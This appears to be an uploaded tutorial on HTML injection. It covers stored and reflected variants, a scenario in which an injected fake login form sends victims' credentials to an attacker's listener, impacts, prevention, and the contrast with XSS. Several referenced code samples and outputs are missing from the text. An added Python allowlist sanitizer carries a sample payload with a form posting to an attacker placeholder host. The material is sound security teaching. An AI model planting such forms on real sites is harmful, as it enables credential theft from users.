HTML Injection

HTML injection is a vulnerability that allows attackers to inject arbitrary HTML code into web pages due to improper input validation and sanitization. There are two main types of HTML injection attacks: stored and reflected, each exploiting user input to execute malicious code. Preventative measures include escaping HTML tags, using whitelist filters, and employing web application firewalls.

Uploaded by

23rudra30
Copyright
© All Rights Reserved

HTML Injection

In order to understand what HTML injection is, we first need to know the basics of HTML.
HTML is the abbreviation for Hyper Text Markup Language. It is a markup language that is used to create web pages, along with CSS and JavaScript, to make web pages attractive and interactive.
In HTML, the term hyperlink refers to links between web pages.
HTML is a markup language that is used by the browser to display text, images and content in a serialized format; the assisting technology CSS (Cascading Style Sheets) is used to add design, colour or style, while JavaScript makes your web page interactive.
An HTML document is made of many HTML tags, and each HTML tag contains different content.
To develop any website, HTML, CSS and JavaScript are very important.

HTML Injection Vulnerability


HTML injection is a type of injection vulnerability that occurs when the user is able to control input and can inject arbitrary HTML code into a vulnerable web page.
This type of vulnerability occurs when the user input is not sanitized and the output is not encoded. The injection allows the attacker to send a malicious HTML page to a victim, and it is a form of social engineering, as the attack exploits both a code-based vulnerability and the user's trust.
The main reason for an HTML injection vulnerability is improper input validation and sanitization, together with output that is not properly encoded.
In XSS, scripts are executed, while in HTML injection malicious HTML tags and payloads are used.

Types of HTML Injection Attacks
1. Stored HTML injection
2. Reflected HTML injection

1.Stored HTML injection


A stored HTML injection attack occurs when the attacker is able to store/inject malicious HTML code on the web server, and it is exploited by the victim's browser every time the victim calls the affected functionality.
For example, the attacker injects/stores HTML code in the user registration page, and it is exploited by the user's browser whenever the user enters credentials in the registration page; the attacker can then easily obtain sensitive info of the user such as cookies, session info, user credentials and more.
The most common example of stored HTML injection is a "Comment" option, where the user/administrator can type anything and it gets stored on the server.
Other examples would be feedback forms, blogs, etc., wherever the user can save input on the server.

2. Reflected HTML injection
Unlike stored injections, reflected attacks are not permanently housed on the server. Instead, they trick users into executing malicious code via a URL. This is often achieved through phishing emails or messages that lure users into clicking on a compromised link.

There are mainly three types of reflected HTML injection:
1. Reflected HTML GET
2. Reflected HTML POST
3. Reflected HTML URL
Example of Reflected HTML GET
Let's say there is an application which hosts a form where the user can insert a first and last name, and it reflects the entered input on the web page.
Let's try to check whether it accepts HTML tags or not.
We inject <h1> tags in the first name parameter, and the response we get from doing this is also shown below.

Output
As we can see, our payload got executed successfully, so we can increase the impact by injecting a malicious link; when the victim clicks on that link, he/she will be taken to the attacker's website, and now we can perform more attacks.
Example of Stored HTML injection
Let's say there is an application where we can write and store blogs. So we can simply store user input here.
Let's try to inject the input below in this application.
<h1> Hello guys, let's talk about HTML injection..!! </h1>

So now we know that this is vulnerable to stored HTML injection, and if any user visits this vulnerable web page, this HTML code will be rendered by their browser and this string will be present on their web page too.
Let's try to increase the impact and upload a malicious login form.
If the victim trusts this vulnerable domain, then he/she will enter the credentials, and the attacker will receive the credentials on its website or listener port.
The following malicious code can be submitted in the field for creating the form.

In the code above, we have an action field which contains the attacker's location, where the credentials will be sent when the victim submits the credentials.
Now, set up a listener on the same IP address with the same port number.

Now the victim visits the web page and submits the credentials.

And the attacker gets the credentials on the listener like this.

Common Attack Scenario

1. Identify the injection in the web page.
2. Craft a malicious link, including the malicious HTML content, and send it to the victim via email.
3. Now, due to trust in the target domain, the victim will visit that page.
4. The attacker's injected HTML is rendered and presented to the user, asking for a username and password.
5. The user enters a username and password, which are both sent to the attacker's server.

Impacts of HTML injection
● An attacker can exploit HTML injection to push a personal agenda or an advertisement for some product they want to sell, or just to defame the website.
● An attacker can host a fake login form, so that the form data submitted by the victim is sent to the attacker's server.
● An attacker may also hijack HTML forms by injecting their own <form> tag before the legitimate <form> tag. This works because the top-level form tag is given precedence.
● An attacker can exfiltrate the anti-CSRF token.

How to prevent HTML injection?


➢ The application should escape all HTML tags from the user input.
➢ In case the application, by design, asks the user to include HTML in the input, then whitelist-based filters can be used.
➢ Blacklist-based filters should be avoided as these are prone to bypasses.
➢ A good Web Application Firewall (WAF) can also be used to prevent these kinds of injection attacks.
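An added example (not from the original document) of the whitelist-based filter recommended above, written in Python with the standard library's HTMLParser: only a small set of formatting tags is kept, attributes are discarded even on those, and every other tag, including the <form> and <script> tags from the stored-injection discussion, is turned back into escaped text. The allowlist and the sample blog comment are constructed for this illustration.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist of harmless formatting tags; anything else (form, a, img, script,
# iframe, ...) is neutralised. Attributes are never kept, so event handlers
# and href/action targets cannot survive on allowed tags either.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}

# Constructed sample: a stored blog comment carrying a fake login form and a script.
SAMPLE_INPUT = (
    '<p>Hello <b>guys</b></p>'
    '<form action="https://attacker-controlled.example/"><input name=user></form>'
    '<script>alert(1)</script>'
)

class AllowlistSanitizer(HTMLParser):
    """Rebuild the markup keeping only allowlisted tags as tags; every other
    tag is re-emitted as HTML-escaped text so the browser shows it literally."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # neutralised tag names, handy for logging/alerting

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attributes deliberately discarded
        else:
            self.dropped.append(tag)
            self.out.append(escape(self.get_starttag_text()))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # treat <br/> like <br>

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
        else:
            self.out.append(escape(f"</{tag}>"))

    def handle_data(self, data):
        self.out.append(escape(data))  # text content is always encoded on output

def sanitize(user_html):
    """Return (clean_html, dropped_tags) for one piece of user-supplied HTML."""
    parser = AllowlistSanitizer()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out), parser.dropped
```

The `dropped` list is worth writing to an application log: a stored comment that tried to smuggle a form or script tag is a signal worth alerting on, not just cleaning.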

Why is HTML injection different from XSS?
HTML injection is an attack that is similar to cross-site scripting (XSS). While in an XSS vulnerability the attacker can inject and execute JavaScript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user-supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack exploits a code-based vulnerability and mainly a user's trust.
● In XSS attacks, various types of payloads can be injected, but the end goal is to execute JavaScript code only, and executing JS code can have a huge impact.
● But here we are only executing HTML code, and hence it has its limitations.
● If we can chain this vulnerability with other vulnerabilities like CSRF, then it can have critical impact as well.
